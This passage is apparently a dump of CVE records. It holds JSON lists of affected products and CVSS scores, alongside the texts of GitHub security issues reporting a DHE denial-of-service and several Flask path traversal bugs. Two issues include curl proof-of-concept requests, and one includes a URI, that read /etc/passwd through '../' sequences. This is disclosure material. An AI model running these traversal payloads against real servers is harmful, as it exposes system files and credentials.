"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8F26AB06-7FEB-4A56-B722-DBDEEE628DB8",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_ddos_hybrid_defender:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EE48C9C9-6B84-4A4A-963D-6DFE0C2FB312",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_domain_name_system:*:*:*:*:*:*:*:*",
"matchCriteriaId": "878CD8E6-6B9B-431D-BD15-F954C7B8076F",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4D9DB9B9-2959-448E-9B59-C873584A0E11",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_fraud_protection_service:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6AF04191-019B-4BC9-A9A7-7B7AA9B5B7D1",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F62D754D-A4A1-4093-AB42-9F51C19976CA",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
"matchCriteriaId": "90084CD6-FA4B-4305-BC65-58237BAF714E",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BC9D4626-915F-42E5-81E0-6F8271084773",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7056F1FA-24AC-4D9F-8DDC-B3CA4740BF5E",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_service_proxy:1.6.0:*:*:*:*:kubernetes:*:*",
"matchCriteriaId": "BC5AC8C7-92BA-48D4-81A1-F5323DA952A9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_ssl_orchestrator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E48AC50D-19B3-4E97-ADD2-B661BD891ED7",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B13C4244-BE15-4F2C-BBBA-35072571B041",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-ip_websafe:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C1B4FBF6-C23A-4BD2-ADFB-9617C03B603A",
"versionEndExcluding": null,
"versionEndIncluding": "17.1.0",
"versionStartExcluding": null,
"versionStartIncluding": "13.1.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-iq_centralized_management:*:*:*:*:*:*:*:*",
"matchCriteriaId": "360D8842-2C55-450F-9AFA-09CA34B12598",
"versionEndExcluding": null,
"versionEndIncluding": "8.2.0",
"versionStartExcluding": null,
"versionStartIncluding": "8.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:big-iq_centralized_management:7.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DA0B396A-B5CE-4337-A33A-EF58C4589CB3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:f5os-a:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C4A3C86A-CA2F-4AC8-A43E-765829A96147",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:f5os-a:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "03E01235-F9B0-4CCF-AA08-FECF61C62B21",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:f5os-c:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3BFAE8EC-9A5F-421D-990D-B6D454DECAEC",
"versionEndExcluding": null,
"versionEndIncluding": "1.3.2",
"versionStartExcluding": null,
"versionStartIncluding": "1.3.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:f5os-c:1.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BC3EDB8D-5C16-49DF-BE48-C83744AD7788",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:f5os-c:1.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "12FEEABD-9A4A-4A33-9B74-7B053352C47D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:traffix_signaling_delivery_controller:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "42836A1C-81BB-4F80-9E32-EEE0DAA18D26",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:f5:traffix_signaling_delivery_controller:5.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DA4D5EC6-8099-4D0A-AD6F-BA3B37C2EBD8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3B3AD582-9909-4FF5-B541-571F18E22356",
"versionEndExcluding": "10.06.0180",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "10.06.0000",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "21F81EB2-3916-4DC6-9600-B7FD17906B53",
"versionEndExcluding": "10.07.0030",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "10.07.0000",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "71284AA8-9E0E-4B2F-8464-B49E1D6965B5",
"versionEndExcluding": "10.08.0010",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "10.08.0000",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F059E5A9-E613-4BE1-BF61-C477B3441175",
"versionEndExcluding": "10.09.0002",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "10.09.0000",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_4100i:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B7C2B56C-203F-4290-BCE7-8BD751DF9CEF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FF1DD310-3D31-4204-92E0-70C33EE44F08",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_6200f:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FCD1A83B-109B-4596-AE37-706751E2B57D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_6200m:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1218AAA5-01ED-4D89-A7AE-A600356ABD46",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_6300f:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4D6F748F-89E9-45FB-8BE7-2201E5EB2755",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_6300m:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8066A871-2683-4F74-9750-E73BF004209F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_6405:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D118A9A6-BBA4-4149-AE0D-1DA2EB45B53F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_6410:-:*:*:*:*:*:*:*",
"matchCriteriaId": "790C5E7A-3405-4873-83E8-4D9C0FEC5E6D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_8320:-:*:*:*:*:*:*:*",
"matchCriteriaId": "10B5F18A-28B0-49B4-8374-C681C2B48D2A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_8325-32c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "59B7E2D3-0B72-4A78-AEFA-F106FAD38156",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_8325-48y8c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7E87A92B-4EE5-4235-A0DA-195F27841DBB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_8360-12c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC24E52-13C0-402F-9ABF-A1DE51719AEF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_8360-16y2c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "76EF979E-061A-42A3-B161-B835E92ED180",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_8360-24xf2c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DE04919C-9289-4FB3-938F-F8BB15EC6A74",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_8360-32y4c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B630C64B-C474-477D-A80B-A0FB73ACCC49",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_8360-48xt4c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "53ABE8B8-A4F6-400B-A893-314BE24D06B8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_8360-48y6c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C44383CC-3751-455E-B1AB-39B16F40DC76",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
},
{
"criteria": "cpe:2.3:h:hpe:aruba_cx_8400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B25A9CD2-5E5F-4BDB-8707-5D6941411A2B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:stormshield:stormshield_management_center:*:*:*:*:*:*:*:*",
"matchCriteriaId": "62A933C5-C56E-485C-AD49-3B6A2C329131",
"versionEndExcluding": "3.3.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:stormshield:stormshield_network_security:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F7387F52-013D-432D-87D8-5D3ABD472C9E",
"versionEndExcluding": "4.3.16",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.7.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:stormshield:stormshield_network_security:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C8A23A5D-928A-4225-9C93-31E5DFE215A7",
"versionEndExcluding": "4.6.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "4.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/mozilla/ssl-config-generator/issues/162 | [
"Issue Tracking"
] | github.com | [
"mozilla",
"ssl-config-generator"
] | [These guys](https://github.com/Balasys/dheater) found a way to saturate the server CPU core to 100% using as little as 5 KB/s of incoming traffic. The pre-requisite is that the server supports DHE as the key exchange. Therefore, to avoid creating such a vulnerable configuration, I propose removing DHE from all levels of SSL config. | Stop recommending DHE, because of "dheater" vulnerability | https://api.github.com/repos/mozilla/server-side-tls/issues/299/comments | 42 | 2021-10-23T22:32:53Z | 2025-01-27T06:18:13Z | https://github.com/mozilla/server-side-tls/issues/299 | 2,812,170,926 | 299 | 2,782 |
CVE-2021-43494 | 2021-11-12T14:15:07.403 | OpenCV-REST-API master branch as of commit 69be158c05d4dd5a4aff38fdc680a162dd6b9e49 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:codingforentrepreneurs:opencv_rest_api:2020-01-24:*:*:*:*:*:*:*",
"matchCriteriaId": "B07D4A89-ED66-40DE-8C64-EB5F42E87854",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"codingforentrepreneurs",
"OpenCV-REST-API"
] | A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
## Root Cause Analysis
In this case, the path traversal vulnerability can be blamed on incorrect usage of the send_from_directory Flask call. The vulnerability occurs due to the code snippet shown below
https://github.com/codingforentrepreneurs/OpenCV-REST-API/blob/69be158c05d4dd5a4aff38fdc680a162dd6b9e49/api/cv/views.py#L7-L15
Here, since the `path` parameter is attacker controlled, the effective directory and filename passed to the send_from_directory call can be controlled by the attacker leading to a path traversal attack.
This can be exploited by accessing a URI like `/static/outputs/../../../../etc/passwd` which will return the contents of the `/etc/passwd` file.
## Remediation
This can be easily fixed my restricting the value of file and path parameters by a fixed whitelist of possible values.
## CVSS 3 Score
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
### This bug was found using *[CodeQL by Github](codeql.github.com/)* | [Security] Path Traversal Vulnerability found | https://api.github.com/repos/codingforentrepreneurs/OpenCV-REST-API/issues/2/comments | 2 | 2021-09-22T22:50:48Z | 2024-01-16T09:03:29Z | https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2 | 1,004,840,798 | 2 | 2,783 |
CVE-2021-43496 | 2021-11-12T14:15:07.447 | Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/varun-suresh/Clustering/issues/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/varun-suresh/Clustering/issues/12"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:*",
"matchCriteriaId": "FD04F65D-025E-4150-A910-B0C38C5E2F51",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/varun-suresh/Clustering/issues/12 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"varun-suresh",
"Clustering"
] | A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
## Root Cause Analysis
In this case, the path traversal vulnerability can be blamed on incorrect usage of the send_from_directory Flask call. The vulnerability occurs due to the code snippet shown below
https://github.com/varun-suresh/Clustering/blob/53e663e259bcfc8cdecb56c0bb255bd70bfcaa70/visualize.py#L33-L36
Here, since the `fpath` parameter is attacker controlled, the effective directory and filename passed to the send_from_directory call can be controlled by the attacker leading to a path traversal attack.
## Proof of Concept
The bug can be verified using the proof of concept similar to the one shown below.
```
curl -i --path-as-is -s -k -X $'GET' \
-H $'Host: 0.0.0.0:5000' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
$'http://0.0.0.0:5000/img/../../../../../../etc/passwd'
```
## Remediation
This can be easily fixed my restricting the value of file and path parameters by a fixed whitelist of possible values.
## CVSS 3 Score
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
### This bug was found using *[CodeQL by Github](codeql.github.com/)* | [Security] Path Traversal Vulnerability found | https://api.github.com/repos/varun-suresh/Clustering/issues/12/comments | 1 | 2021-09-22T22:24:23Z | 2022-04-23T22:45:11Z | https://github.com/varun-suresh/Clustering/issues/12 | 1,004,827,518 | 12 | 2,784 |
CVE-2021-43492 | 2021-11-12T15:15:10.997 | AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system andcan significantly aid in getting remote code access. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/AlquistManager/alquist/issues/42"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/AlquistManager/alquist/issues/42"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:*",
"matchCriteriaId": "022CFA01-411F-40C5-80A2-7FED3557C578",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/AlquistManager/alquist/issues/42 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"AlquistManager",
"alquist"
] | A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
## Root Cause Analysis
In the case of Alquist, the path traversal vulnerability can be blamed on incorrect usage of the `send_from_directory` Flask call. The vulnerability occurs due to the code snippet shown below
https://github.com/AlquistManager/alquist/blob/280d99f43b11378212652e75f6f3159cde9c1d36/IO/input.py#L69-L72
Here, since the `path` and `file` parameters are attacker controlled, the effective directory and filename passed to the `send_from_directory` call can be controlled by the attacker leading to a path traversal attack.
## Proof of Concept
The bug can be verified using the proof of concept similar to the one shown below.
```
curl -i --path-as-is -s -k -X $'GET' \
-H $'Host: 0.0.0.0:5000' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
$'http://0.0.0.0:5000/client/../../../../../etc/../../../etc/passwd'
```
## Remediation
This can be easily fixed my restricting the value of `file` and `path` parameters by a fixed whitelist of possible values.
This bug was found using *[CodeQL by Github](codeql.github.com/)* | [Security] : Path Traversal in the IO module | https://api.github.com/repos/AlquistManager/alquist/issues/42/comments | 1 | 2021-09-22T20:04:48Z | 2022-04-23T22:45:03Z | https://github.com/AlquistManager/alquist/issues/42 | 1,004,725,779 | 42 | 2,785 |
CVE-2021-43493 | 2021-11-12T15:15:11.040 | ServerManagement master branch as of commit 49491cc6f94980e6be7791d17be947c27071eb56 is affected by a directory traversal vulnerability. This vulnerability can be used to extract credentials which can in turn be used to execute code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
